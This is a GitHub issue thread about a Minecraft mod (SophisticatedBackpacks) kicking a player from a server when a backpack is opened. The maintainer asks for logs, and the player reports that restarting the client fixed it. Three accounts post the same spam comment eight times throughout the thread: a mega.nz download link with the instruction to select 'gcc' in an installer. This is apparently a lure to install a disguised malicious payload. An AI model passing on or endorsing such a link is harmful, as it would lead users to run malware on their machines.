### ISSUE TITLE
I get kicked out of my server

### ISSUE THREAD

**Issue by Superredstone** [P3pp3rF1y/SophisticatedBackpacks#1125]
**Describe the bug**
The backpacks were working fine until today, every time I try to open my backpack i get kicked out of my server with the following message: 
![2024-08-25_10-51](https://github.com/user-attachments/assets/a2b8af83-3fca-4e66-9603-48d248f33519)

**To Reproduce**
1. Open backpack

**Expected behavior**
The backpack should open

**Versions**
Neoforge: 20.4.237 
Minecraft: 1.20.4
Modpack: Neotech 1.7.0
Mod: 3.20.6

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by P3pp3rF1y** [comment]
I am not going to test modpacks or anything similar, but what could help me is crashlog or latest/debug log from when this happens because I need to see more than just this message

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Superredstone** [comment]
Log: https://mclo.gs/YQUzZ1i
(these spamming bots are really annoying)

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Superredstone** [comment]
Today I started my server as usual and the backpacks seems working again, I'm gonna post an update if it happens again (yesterday I restarted the server but the problem was still there, the only thing that I didn't try was restarting my client so maybe  the problem is there)

EDIT: Apparently restarting the client solves the issue

**Comment by P3pp3rF1y** [comment]
I am going to assume that this fixed itself somehow and close , if you happen to run into it again feel free to reopen
